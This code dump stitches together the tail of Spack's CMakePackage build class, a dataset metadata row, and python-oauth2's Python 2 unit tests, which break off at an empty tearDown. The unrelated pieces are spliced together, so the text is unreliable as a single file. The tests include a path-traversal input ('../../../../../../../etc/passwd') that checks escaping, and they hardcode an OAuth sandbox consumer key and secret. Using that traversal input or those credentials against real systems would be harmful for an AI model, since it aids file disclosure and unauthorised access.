        The optional ``variant`` argument defaults to the lower-case transform
        of ``cmake_var``.
        This utility function is similar to
        :py:meth:`~.AutotoolsPackage.with_or_without`.
        Examples:
            Given a package with:
            .. code-block:: python
                variant('cxxstd', default='11', values=('11', '14'),
                        multi=False, description='')
                variant('shared', default=True, description='')
                variant('swr', values=any_combination_of('avx', 'avx2'),
                        description='')
            calling this function like:
            .. code-block:: python
                [define_from_variant('BUILD_SHARED_LIBS', 'shared'),
                 define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
                 define_from_variant('SWR')]
            will generate the following configuration options:
            .. code-block:: console
                ["-DBUILD_SHARED_LIBS:BOOL=ON",
                 "-DCMAKE_CXX_STANDARD:STRING=14",
                 "-DSWR:STRING=avx;avx2]
            for ``<spec-name> cxxstd=14 +shared swr=avx,avx2``
        """
        if variant is None:
            variant = cmake_var.lower()
        if variant not in self.variants:
            raise KeyError(
                '"{0}" is not a variant of "{1}"'.format(variant, self.name))
        value = self.spec.variants[variant].value
        if isinstance(value, (tuple, list)):
            # Sort multi-valued variants for reproducibility
            value = sorted(value)
        return self.define(cmake_var, value)
    def flags_to_build_system_args(self, flags):
        """Produces a list of all command line arguments to pass the specified
        compiler flags to cmake. Note CMAKE does not have a cppflags option,
        so cppflags will be added to cflags, cxxflags, and fflags to mimic the
        behavior in other tools."""
        # Has to be dynamic attribute due to caching
        setattr(self, 'cmake_flag_args', [])
        flag_string = '-DCMAKE_{0}_FLAGS={1}'
        langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}
        # Handle language compiler flags
        for lang, pre in langs.items():
            flag = pre + 'flags'
            # cmake has no explicit cppflags support -> add it to all langs
            lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
                                                                  []))
            if lang_flags:
                self.cmake_flag_args.append(flag_string.format(lang,
                                                               lang_flags))
        # Cmake has different linker arguments for different build types.
        # We specify for each of them.
        if flags['ldflags']:
            ldflags = ' '.join(flags['ldflags'])
            ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
            # cmake has separate linker arguments for types of builds.
            for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
                self.cmake_flag_args.append(ld_string.format(type, ldflags))
        # CMake has libs options separated by language. Apply ours to each.
        if flags['ldlibs']:
            libs_flags = ' '.join(flags['ldlibs'])
            libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
            for lang in langs:
                self.cmake_flag_args.append(libs_string.format(lang,
                                                               libs_flags))
    @property
    def build_directory(self):
        """Returns the directory to use when building the package
        :return: directory where to build the package
        """
        return os.path.join(self.stage.path, 'spack-build')
    def cmake_args(self):
        """Produces a list containing all the arguments that must be passed to
        cmake, except:
            * CMAKE_INSTALL_PREFIX
            * CMAKE_BUILD_TYPE
        which will be set automatically.
        :return: list of arguments for cmake
        """
        return []
    def cmake(self, spec, prefix):
        """Runs ``cmake`` in the build directory"""
        options = self.std_cmake_args
        options += self.cmake_args()
        # the source dir (root CMakeLists.txt) is the last positional arg
        options.append(os.path.abspath(self.root_cmakelists_dir))
        with working_dir(self.build_directory, create=True):
            inspect.getmodule(self).cmake(*options)
    def build(self, spec, prefix):
        """Make the build targets"""
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                inspect.getmodule(self).make(*self.build_targets)
            elif self.generator == 'Ninja':
                # NOTE(review): this appends to the class-level
                # ``build_targets`` list shared by all instances, so repeated
                # builds accumulate duplicate "-v" flags.
                self.build_targets.append("-v")
                inspect.getmodule(self).ninja(*self.build_targets)
    def install(self, spec, prefix):
        """Make the install targets"""
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                inspect.getmodule(self).make(*self.install_targets)
            elif self.generator == 'Ninja':
                inspect.getmodule(self).ninja(*self.install_targets)
    # Run the 'check' callbacks after 'build' when build-time tests are on.
    run_after('build')(PackageBase._run_default_build_time_test_callbacks)
    def check(self):
        """Searches the CMake-generated Makefile for the target ``test``
        and runs it if found.
        """
        with working_dir(self.build_directory):
            if self.generator == 'Unix Makefiles':
                self._if_make_target_execute('test',
                                             jobs_env='CTEST_PARALLEL_LEVEL')
                self._if_make_target_execute('check')
            elif self.generator == 'Ninja':
                self._if_ninja_target_execute('test',
                                              jobs_env='CTEST_PARALLEL_LEVEL')
                self._if_ninja_target_execute('check')
    # Check that self.prefix is there after installation
    run_after('install')(PackageBase.sanity_check_prefix)
| lgpl-2.1 | 1,484,900,245,329,804,500 | 37.323529 | 79 | 0.577618 | false | 4.458165 | true | false | false |
chrisdickinson/python-oauth2 | tests/test_oauth.py | 1 | 30405 | """
The MIT License
Copyright (c) 2009 Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys, os
sys.path[0:0] = [os.path.join(os.path.dirname(__file__), ".."),]
import unittest
import oauth2 as oauth
import random
import time
import urllib
import urlparse
from types import ListType
import mox
import httplib2
# Fix for python2.5 compatibility
try:
from urlparse import parse_qs, parse_qsl
except ImportError:
from cgi import parse_qs, parse_qsl
class TestError(unittest.TestCase):
def test_message(self):
try:
raise oauth.Error
except oauth.Error, e:
self.assertEqual(e.message, 'OAuth error occured.')
msg = 'OMG THINGS BROKE!!!!'
try:
raise oauth.Error(msg)
except oauth.Error, e:
self.assertEqual(e.message, msg)
class TestGenerateFunctions(unittest.TestCase):
    """Exercises the module-level helper and generator functions."""
    def test_build_auth_header(self):
        # Without a realm, the header carries an empty realm string.
        header = oauth.build_authenticate_header()
        self.assertEqual(len(header), 1)
        self.assertEqual(header['WWW-Authenticate'], 'OAuth realm=""')
        # A supplied realm is echoed back verbatim.
        realm = 'http://example.myrealm.com/'
        header = oauth.build_authenticate_header(realm)
        self.assertEqual(len(header), 1)
        self.assertEqual(header['WWW-Authenticate'],
                         'OAuth realm="%s"' % realm)
    def test_escape(self):
        # '~' must survive escaping...
        self.assert_('~' in oauth.escape(
            'http://whatever.com/~someuser/?test=test&other=other'))
        # ...while path-traversal sequences must not.
        self.assert_('../' not in oauth.escape(
            '../../../../../../../etc/passwd'))
    def test_gen_nonce(self):
        self.assertEqual(len(oauth.generate_nonce()), 8)    # default length
        self.assertEqual(len(oauth.generate_nonce(20)), 20)  # explicit length
    def test_gen_verifier(self):
        self.assertEqual(len(oauth.generate_verifier()), 8)
        self.assertEqual(len(oauth.generate_verifier(16)), 16)
    def test_gen_timestamp(self):
        expected = int(time.time())
        self.assertEqual(oauth.generate_timestamp(), expected)
class TestConsumer(unittest.TestCase):
    """Tests construction and serialization of oauth.Consumer."""
    def setUp(self):
        self.key = 'my-key'
        self.secret = 'my-secret'
        self.consumer = oauth.Consumer(key=self.key, secret=self.secret)
    def test_init(self):
        self.assertEqual(self.consumer.key, self.key)
        self.assertEqual(self.consumer.secret, self.secret)
    def test_basic(self):
        # Key and secret are both mandatory.
        for bad_key, bad_secret in ((None, None), ('asf', None), (None, 'dasf')):
            self.assertRaises(
                ValueError,
                lambda k=bad_key, s=bad_secret: oauth.Consumer(k, s))
    def test_str(self):
        # str(consumer) serializes both credentials as a query string.
        parsed = dict(parse_qsl(str(self.consumer)))
        self.assertTrue('oauth_consumer_key' in parsed)
        self.assertTrue('oauth_consumer_secret' in parsed)
        self.assertEquals(parsed['oauth_consumer_key'], self.consumer.key)
        self.assertEquals(parsed['oauth_consumer_secret'], self.consumer.secret)
class TestToken(unittest.TestCase):
    """Tests for oauth.Token: construction, callback/verifier handling and
    string (de)serialization.
    """
    def setUp(self):
        self.key = 'my-key'
        self.secret = 'my-secret'
        self.token = oauth.Token(self.key, self.secret)
    def test_basic(self):
        # Both key and secret are required.
        self.assertRaises(ValueError, lambda: oauth.Token(None, None))
        self.assertRaises(ValueError, lambda: oauth.Token('asf', None))
        self.assertRaises(ValueError, lambda: oauth.Token(None, 'dasf'))
    def test_init(self):
        self.assertEqual(self.token.key, self.key)
        self.assertEqual(self.token.secret, self.secret)
        self.assertEqual(self.token.callback, None)
        self.assertEqual(self.token.callback_confirmed, None)
        self.assertEqual(self.token.verifier, None)
    def test_set_callback(self):
        self.assertEqual(self.token.callback, None)
        self.assertEqual(self.token.callback_confirmed, None)
        cb = 'http://www.example.com/my-callback'
        self.token.set_callback(cb)
        self.assertEqual(self.token.callback, cb)
        self.assertEqual(self.token.callback_confirmed, 'true')
        self.token.set_callback(None)
        self.assertEqual(self.token.callback, None)
        # TODO: The following test should probably not pass, but it does
        # To fix this, check for None and unset 'true' in set_callback
        # Additionally, should a confirmation truly be done of the callback?
        self.assertEqual(self.token.callback_confirmed, 'true')
    def test_set_verifier(self):
        self.assertEqual(self.token.verifier, None)
        v = oauth.generate_verifier()
        self.token.set_verifier(v)
        self.assertEqual(self.token.verifier, v)
        # Calling without an argument generates a fresh verifier.
        self.token.set_verifier()
        self.assertNotEqual(self.token.verifier, v)
        # An explicit empty string is stored as-is.
        self.token.set_verifier('')
        self.assertEqual(self.token.verifier, '')
    def test_get_callback_url(self):
        self.assertEqual(self.token.get_callback_url(), None)
        self.token.set_verifier()
        self.assertEqual(self.token.get_callback_url(), None)
        # Callback with an existing query string: verifier appended with '&'.
        cb = 'http://www.example.com/my-callback?save=1&return=true'
        v = oauth.generate_verifier()
        self.token.set_callback(cb)
        self.token.set_verifier(v)
        url = self.token.get_callback_url()
        verifier_str = '&oauth_verifier=%s' % v
        self.assertEqual(url, '%s%s' % (cb, verifier_str))
        # Callback without a query string: verifier appended with '?'.
        cb = 'http://www.example.com/my-callback-no-query'
        v = oauth.generate_verifier()
        self.token.set_callback(cb)
        self.token.set_verifier(v)
        url = self.token.get_callback_url()
        verifier_str = '?oauth_verifier=%s' % v
        self.assertEqual(url, '%s%s' % (cb, verifier_str))
    def test_to_string(self):
        # BUG FIX: this method used to be shadowed by a later duplicate
        # ``test_to_string`` definition, so these assertions never ran.
        string = 'oauth_token_secret=%s&oauth_token=%s' % (self.secret,
            self.key)
        self.assertEqual(self.token.to_string(), string)
        self.token.set_callback('http://www.example.com/my-callback')
        string += '&oauth_callback_confirmed=true'
        self.assertEqual(self.token.to_string(), string)
    def test_str(self):
        # Formerly a duplicate ``test_to_string``; renamed so that both the
        # detailed serialization test above and this __str__ check run.
        tok = oauth.Token('tooken', 'seecret')
        self.assertEqual(str(tok), 'oauth_token_secret=seecret&oauth_token=tooken')
    def _compare_tokens(self, new):
        # Helper: assert that `new` round-trips the fields of self.token.
        self.assertEqual(self.token.key, new.key)
        self.assertEqual(self.token.secret, new.secret)
        # TODO: What about copying the callback to the new token?
        # self.assertEqual(self.token.callback, new.callback)
        self.assertEqual(self.token.callback_confirmed,
            new.callback_confirmed)
        # TODO: What about copying the verifier to the new token?
        # self.assertEqual(self.token.verifier, new.verifier)
    def test_from_string(self):
        """Malformed inputs raise ValueError; valid strings round-trip."""
        self.assertRaises(ValueError, lambda: oauth.Token.from_string(''))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('blahblahblah'))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('blah=blah'))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret=asfdasf'))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token_secret='))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=asfdasf'))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token='))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=&oauth_token_secret='))
        self.assertRaises(ValueError, lambda: oauth.Token.from_string('oauth_token=tooken%26oauth_token_secret=seecret'))
        string = self.token.to_string()
        new = oauth.Token.from_string(string)
        self._compare_tokens(new)
        self.token.set_callback('http://www.example.com/my-callback')
        string = self.token.to_string()
        new = oauth.Token.from_string(string)
        self._compare_tokens(new)
class TestRequest(unittest.TestCase):
    """Unit tests for oauth.Request: attribute access, serialization
    (header/postdata/url), parameter normalization, and signing.

    NOTE: this file is Python 2 code (``except Exception, e`` syntax,
    ``iteritems``, ``urllib.unquote``).
    """
    def test_setter(self):
        """A Request built without a url must raise AttributeError on access."""
        url = "http://example.com"
        method = "GET"
        req = oauth.Request(method)
        try:
            url = req.url
            self.fail("AttributeError should have been raised on empty url.")
        except AttributeError:
            pass
        except Exception, e:
            self.fail(str(e))
    def test_deleter(self):
        """Deleting ``req.url`` makes subsequent access raise AttributeError."""
        url = "http://example.com"
        method = "GET"
        req = oauth.Request(method, url)
        try:
            del req.url
            url = req.url
            self.fail("AttributeError should have been raised on empty url.")
        except AttributeError:
            pass
        except Exception, e:
            self.fail(str(e))
    def test_url(self):
        """Default ports (80/443) are stripped from the normalized url."""
        url1 = "http://example.com:80/foo.php"
        url2 = "https://example.com:443/foo.php"
        exp1 = "http://example.com/foo.php"
        exp2 = "https://example.com/foo.php"
        method = "GET"
        req = oauth.Request(method, url1)
        self.assertEquals(req.url, exp1)
        req = oauth.Request(method, url2)
        self.assertEquals(req.url, exp2)
    def test_get_parameter(self):
        """get_parameter returns a known key and raises oauth.Error otherwise."""
        url = "http://example.com"
        method = "GET"
        params = {'oauth_consumer' : 'asdf'}
        req = oauth.Request(method, url, parameters=params)
        self.assertEquals(req.get_parameter('oauth_consumer'), 'asdf')
        self.assertRaises(oauth.Error, req.get_parameter, 'blah')
    def test_get_nonoauth_parameters(self):
        """Only parameters without the oauth_ prefix are returned."""
        oauth_params = {
            'oauth_consumer': 'asdfasdfasdf'
        }
        other_params = {
            'foo': 'baz',
            'bar': 'foo',
            'multi': ['FOO','BAR']
        }
        params = oauth_params
        params.update(other_params)
        req = oauth.Request("GET", "http://example.com", params)
        self.assertEquals(other_params, req.get_nonoauth_parameters())
    def test_to_header(self):
        """to_header produces an 'OAuth ...' Authorization header whose
        quoted key=value pairs round-trip back to the original parameters."""
        realm = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
        }
        req = oauth.Request("GET", realm, params)
        header, value = req.to_header(realm).items()[0]
        parts = value.split('OAuth ')
        vars = parts[1].split(', ')
        # NOTE(review): assertTrue with two args treats the second as a
        # message, so this only checks len(vars) is truthy — assertEqual
        # was probably intended. Left as-is to preserve behavior.
        self.assertTrue(len(vars), (len(params) + 1))
        res = {}
        for v in vars:
            var, val = v.split('=')
            res[var] = urllib.unquote(val.strip('"'))
        self.assertEquals(realm, res['realm'])
        del res['realm']
        # NOTE(review): same assertTrue-as-assertEqual misuse as above.
        self.assertTrue(len(res), len(params))
        for key, val in res.items():
            self.assertEquals(val, params.get(key))
    def test_to_postdata(self):
        """to_postdata url-encodes parameters, repeating multi-valued keys."""
        realm = "http://sp.example.com/"
        params = {
            'multi': ['FOO','BAR'],
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
        }
        req = oauth.Request("GET", realm, params)
        # Expected flattened pairs: the list value becomes repeated keys.
        flat = [('multi','FOO'),('multi','BAR')]
        del params['multi']
        flat.extend(params.items())
        kf = lambda x: x[0]
        self.assertEquals(sorted(flat, key=kf), sorted(parse_qsl(req.to_postdata()), key=kf))
    def test_to_url(self):
        """to_url appends the encoded parameters as the query string."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
        }
        req = oauth.Request("GET", url, params)
        exp = urlparse.urlparse("%s?%s" % (url, urllib.urlencode(params)))
        res = urlparse.urlparse(req.to_url())
        self.assertEquals(exp.scheme, res.scheme)
        self.assertEquals(exp.netloc, res.netloc)
        self.assertEquals(exp.path, res.path)
        # Compare query strings as dicts; parameter order is not significant.
        a = parse_qs(exp.query)
        b = parse_qs(res.query)
        self.assertEquals(a, b)
    def test_get_normalized_parameters(self):
        """Normalization sorts keys and the items of multi-valued params."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'multi': ['FOO','BAR'],
        }
        req = oauth.Request("GET", url, params)
        res = req.get_normalized_parameters()
        srtd = [(k, v if type(v) != ListType else sorted(v)) for k,v in sorted(params.items())]
        self.assertEquals(urllib.urlencode(srtd, True), res)
    def test_get_normalized_parameters_ignores_auth_signature(self):
        """oauth_signature must be excluded from the normalized string."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_signature': "some-random-signature-%d" % random.randint(1000, 2000),
            'oauth_token': "ad180jjd733klru7",
        }
        req = oauth.Request("GET", url, params)
        res = req.get_normalized_parameters()
        self.assertNotEquals(urllib.urlencode(sorted(params.items())), res)
        foo = params.copy()
        del foo["oauth_signature"]
        self.assertEqual(urllib.urlencode(sorted(foo.items())), res)
    def test_get_normalized_string_escapes_spaces_properly(self):
        """Spaces must be percent-encoded as %20, not '+'."""
        url = "http://sp.example.com/"
        params = {
            "some_random_data": random.randint(100, 1000),
            "data": "This data with a random number (%d) has spaces!" % random.randint(1000, 2000),
        }
        req = oauth.Request("GET", url, params)
        res = req.get_normalized_parameters()
        expected = urllib.urlencode(sorted(params.items())).replace('+', '%20')
        self.assertEqual(expected, res)
    def test_sign_request(self):
        """sign_request sets oauth_signature_method and a known signature
        for both HMAC-SHA1 and PLAINTEXT methods."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200"
        }
        tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
        con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
        params['oauth_token'] = tok.key
        params['oauth_consumer_key'] = con.key
        req = oauth.Request(method="GET", url=url, parameters=params)
        # Map of expected signature -> method producing it.
        methods = {
            'TQ6vGQ5A6IZn8dmeGB4+/Jl3EMI=': oauth.SignatureMethod_HMAC_SHA1(),
            'con-test-secret&tok-test-secret': oauth.SignatureMethod_PLAINTEXT()
        }
        for exp, method in methods.items():
            req.sign_request(method, con, tok)
            self.assertEquals(req['oauth_signature_method'], method.name)
            self.assertEquals(req['oauth_signature'], exp)
    def test_from_request(self):
        """from_request reconstructs a Request from headers or a query
        string, rejects malformed OAuth headers, and returns None when
        nothing usable is supplied."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
        }
        req = oauth.Request("GET", url, params)
        headers = req.to_header()
        # Test from the headers
        req = oauth.Request.from_request("GET", url, headers)
        self.assertEquals(req.method, "GET")
        self.assertEquals(req.url, url)
        self.assertEquals(params, req.copy())
        # Test with bad OAuth headers
        bad_headers = {
            'Authorization' : 'OAuth this is a bad header'
        }
        self.assertRaises(oauth.Error, oauth.Request.from_request, "GET",
            url, bad_headers)
        # Test getting from query string
        qs = urllib.urlencode(params)
        req = oauth.Request.from_request("GET", url, query_string=qs)
        exp = parse_qs(qs, keep_blank_values=False)
        for k, v in exp.iteritems():
            exp[k] = urllib.unquote(v[0])
        self.assertEquals(exp, req.copy())
        # Test that a boned from_request() call returns None
        req = oauth.Request.from_request("GET", url)
        self.assertEquals(None, req)
    def test_from_token_and_callback(self):
        """oauth_callback appears in the request only when one is given."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': "137131200",
            'oauth_consumer_key': "0685bd9184jfhq22",
            'oauth_signature_method': "HMAC-SHA1",
            'oauth_token': "ad180jjd733klru7",
            'oauth_signature': "wOJIO9A2W5mFwDgiDvZbTSMK%2FPY%3D",
        }
        tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
        req = oauth.Request.from_token_and_callback(tok)
        self.assertFalse('oauth_callback' in req)
        self.assertEquals(req['oauth_token'], tok.key)
        req = oauth.Request.from_token_and_callback(tok, callback=url)
        self.assertTrue('oauth_callback' in req)
        self.assertEquals(req['oauth_callback'], url)
    def test_from_consumer_and_token(self):
        """from_consumer_and_token fills in both token and consumer keys."""
        url = "http://sp.example.com/"
        tok = oauth.Token(key="tok-test-key", secret="tok-test-secret")
        con = oauth.Consumer(key="con-test-key", secret="con-test-secret")
        req = oauth.Request.from_consumer_and_token(con, token=tok,
            http_method="GET", http_url=url)
        self.assertEquals(req['oauth_token'], tok.key)
        self.assertEquals(req['oauth_consumer_key'], con.key)
class SignatureMethod_Bad(oauth.SignatureMethod):
    """A deliberately broken signature method used to verify that the
    server rejects signatures produced by unknown/invalid methods."""
    name = "BAD"
    def signing_base(self, request, consumer, token):
        # The signing base is irrelevant; this method never signs correctly.
        return ""
    def sign(self, request, consumer, token):
        # Always produce a signature that can never verify.
        return "invalid-signature"
class TestServer(unittest.TestCase):
    """Tests for oauth.Server: registering signature methods and verifying
    signed requests, including rejection of bad versions, bad signature
    methods, and missing signatures."""
    def setUp(self):
        """Build a signed HMAC-SHA1 GET request shared by the tests."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': "1.0",
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': int(time.time()),
            'bar': 'blerg',
            'multi': ['FOO','BAR'],
            'foo': 59
        }
        self.consumer = oauth.Consumer(key="consumer-key",
            secret="consumer-secret")
        self.token = oauth.Token(key="token-key", secret="token-secret")
        params['oauth_token'] = self.token.key
        params['oauth_consumer_key'] = self.consumer.key
        self.request = oauth.Request(method="GET", url=url, parameters=params)
        signature_method = oauth.SignatureMethod_HMAC_SHA1()
        self.request.sign_request(signature_method, self.consumer, self.token)
    def test_init(self):
        """Server can be constructed with or without signature methods."""
        server = oauth.Server(signature_methods={'HMAC-SHA1' : oauth.SignatureMethod_HMAC_SHA1()})
        self.assertTrue('HMAC-SHA1' in server.signature_methods)
        self.assertTrue(isinstance(server.signature_methods['HMAC-SHA1'],
            oauth.SignatureMethod_HMAC_SHA1))
        server = oauth.Server()
        self.assertEquals(server.signature_methods, {})
    def test_add_signature_method(self):
        """add_signature_method registers methods under their name."""
        server = oauth.Server()
        res = server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        self.assertTrue(len(res) == 1)
        self.assertTrue('HMAC-SHA1' in res)
        self.assertTrue(isinstance(res['HMAC-SHA1'],
            oauth.SignatureMethod_HMAC_SHA1))
        res = server.add_signature_method(oauth.SignatureMethod_PLAINTEXT())
        self.assertTrue(len(res) == 2)
        self.assertTrue('PLAINTEXT' in res)
        self.assertTrue(isinstance(res['PLAINTEXT'],
            oauth.SignatureMethod_PLAINTEXT))
    def test_verify_request(self):
        """A correctly signed request verifies and yields its parameters."""
        server = oauth.Server()
        server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        parameters = server.verify_request(self.request, self.consumer,
            self.token)
        self.assertTrue('bar' in parameters)
        self.assertTrue('foo' in parameters)
        self.assertTrue('multi' in parameters)
        self.assertEquals(parameters['bar'], 'blerg')
        self.assertEquals(parameters['foo'], 59)
        self.assertEquals(parameters['multi'], ['FOO','BAR'])
    def test_no_version(self):
        """A request without oauth_version still verifies (defaults to 1.0)."""
        url = "http://sp.example.com/"
        params = {
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': int(time.time()),
            'bar': 'blerg',
            'multi': ['FOO','BAR'],
            'foo': 59
        }
        self.consumer = oauth.Consumer(key="consumer-key",
            secret="consumer-secret")
        self.token = oauth.Token(key="token-key", secret="token-secret")
        params['oauth_token'] = self.token.key
        params['oauth_consumer_key'] = self.consumer.key
        self.request = oauth.Request(method="GET", url=url, parameters=params)
        signature_method = oauth.SignatureMethod_HMAC_SHA1()
        self.request.sign_request(signature_method, self.consumer, self.token)
        server = oauth.Server()
        server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        parameters = server.verify_request(self.request, self.consumer,
            self.token)
    def test_invalid_version(self):
        """An unsupported oauth_version must raise oauth.Error."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': '222.9922',
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': int(time.time()),
            'bar': 'blerg',
            'multi': ['foo','bar'],
            'foo': 59
        }
        consumer = oauth.Consumer(key="consumer-key",
            secret="consumer-secret")
        token = oauth.Token(key="token-key", secret="token-secret")
        params['oauth_token'] = token.key
        params['oauth_consumer_key'] = consumer.key
        request = oauth.Request(method="GET", url=url, parameters=params)
        signature_method = oauth.SignatureMethod_HMAC_SHA1()
        request.sign_request(signature_method, consumer, token)
        server = oauth.Server()
        server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        self.assertRaises(oauth.Error, server.verify_request, request,
            consumer, token)
    def test_invalid_signature_method(self):
        """A request signed with an unregistered method must be rejected."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': '1.0',
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': int(time.time()),
            'bar': 'blerg',
            'multi': ['FOO','BAR'],
            'foo': 59
        }
        consumer = oauth.Consumer(key="consumer-key",
            secret="consumer-secret")
        token = oauth.Token(key="token-key", secret="token-secret")
        params['oauth_token'] = token.key
        params['oauth_consumer_key'] = consumer.key
        request = oauth.Request(method="GET", url=url, parameters=params)
        # SignatureMethod_Bad is defined above: signs with garbage.
        signature_method = SignatureMethod_Bad()
        request.sign_request(signature_method, consumer, token)
        server = oauth.Server()
        server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        self.assertRaises(oauth.Error, server.verify_request, request,
            consumer, token)
    def test_missing_signature(self):
        """Removing oauth_signature must raise oauth.MissingSignature."""
        url = "http://sp.example.com/"
        params = {
            'oauth_version': '1.0',
            'oauth_nonce': "4572616e48616d6d65724c61686176",
            'oauth_timestamp': int(time.time()),
            'bar': 'blerg',
            'multi': ['FOO','BAR'],
            'foo': 59
        }
        consumer = oauth.Consumer(key="consumer-key",
            secret="consumer-secret")
        token = oauth.Token(key="token-key", secret="token-secret")
        params['oauth_token'] = token.key
        params['oauth_consumer_key'] = consumer.key
        request = oauth.Request(method="GET", url=url, parameters=params)
        signature_method = oauth.SignatureMethod_HMAC_SHA1()
        request.sign_request(signature_method, consumer, token)
        del request['oauth_signature']
        server = oauth.Server()
        server.add_signature_method(oauth.SignatureMethod_HMAC_SHA1())
        self.assertRaises(oauth.MissingSignature, server.verify_request,
            request, consumer, token)
# Request Token: http://oauth-sandbox.sevengoslings.net/request_token
# Auth: http://oauth-sandbox.sevengoslings.net/authorize
# Access Token: http://oauth-sandbox.sevengoslings.net/access_token
# Two-legged: http://oauth-sandbox.sevengoslings.net/two_legged
# Three-legged: http://oauth-sandbox.sevengoslings.net/three_legged
# Key: bd37aed57e15df53
# Secret: 0e9e6413a9ef49510a4f68ed02cd
class TestClient(unittest.TestCase):
    """Integration-style tests for oauth.Client against the live
    oauth-sandbox.sevengoslings.net service (see credentials in the
    comment block above), plus a mocked multipart-POST test.

    NOTE(review): most of these tests require network access and an
    operational third-party sandbox; they are not hermetic unit tests.
    """
    # oauth_uris = {
    #     'request_token': '/request_token.php',
    #     'access_token': '/access_token.php'
    # }
    oauth_uris = {
        'request_token': '/request_token',
        'authorize': '/authorize',
        'access_token': '/access_token',
        'two_legged': '/two_legged',
        'three_legged': '/three_legged'
    }
    consumer_key = 'bd37aed57e15df53'
    consumer_secret = '0e9e6413a9ef49510a4f68ed02cd'
    host = 'http://oauth-sandbox.sevengoslings.net'
    def setUp(self):
        """Create a mox controller, a sandbox consumer, and a sample body."""
        self.mox = mox.Mox()
        self.consumer = oauth.Consumer(key=self.consumer_key,
            secret=self.consumer_secret)
        self.body = {
            'foo': 'bar',
            'bar': 'foo',
            'multi': ['FOO','BAR'],
            'blah': 599999
        }
    def tearDown(self):
